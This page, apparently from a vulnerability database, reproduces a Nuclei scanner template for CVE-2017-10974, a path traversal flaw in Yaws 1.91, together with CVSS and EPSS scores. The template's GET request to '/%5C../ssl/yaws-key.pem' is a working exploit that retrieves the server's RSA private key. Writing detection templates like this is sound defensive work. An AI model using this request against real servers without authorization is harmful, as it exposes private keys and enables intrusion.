Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-10974
HistoryNov 08, 2021 - 10:38 p.m.

Yaws 1.91 - Local File Inclusion

2021-11-0822:38:40
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.962 High

EPSS

Percentile

99.5%

Yaws 1.91 allows unauthenticated local file inclusion via /%5C…/ submitted to port 8080.

id: CVE-2017-10974

info:
  name: Yaws 1.91 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Yaws 1.91 allows unauthenticated local file inclusion via  /%5C../ submitted to port 8080.
  impact: |
    The vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to a patched version of Yaws or apply the necessary security patches.
  reference:
    - https://www.exploit-db.com/exploits/42303
    - https://nvd.nist.gov/vuln/detail/CVE-2017-10974
    - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
    - https://www.exploit-db.com/exploits/42303/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-10974
    cwe-id: CWE-22
    epss-score: 0.96161
    epss-percentile: 0.9947
    cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: yaws
    product: yaws
  tags: cve,cve2017,edb,yaws,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/%5C../ssl/yaws-key.pem"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - '!contains(tolower(body), "<html")'

      - type: word
        words:
          - "BEGIN RSA PRIVATE KEY"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bf36b71dcf43bb67c28e949553a05d8ad1e497cba64596eb43f94804d769db8102201ef0c4730c3e757ac21667bf32a685c6b09dc21deaf67677b4765cd6c6b4ab1f:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.962 High

EPSS

Percentile

99.5%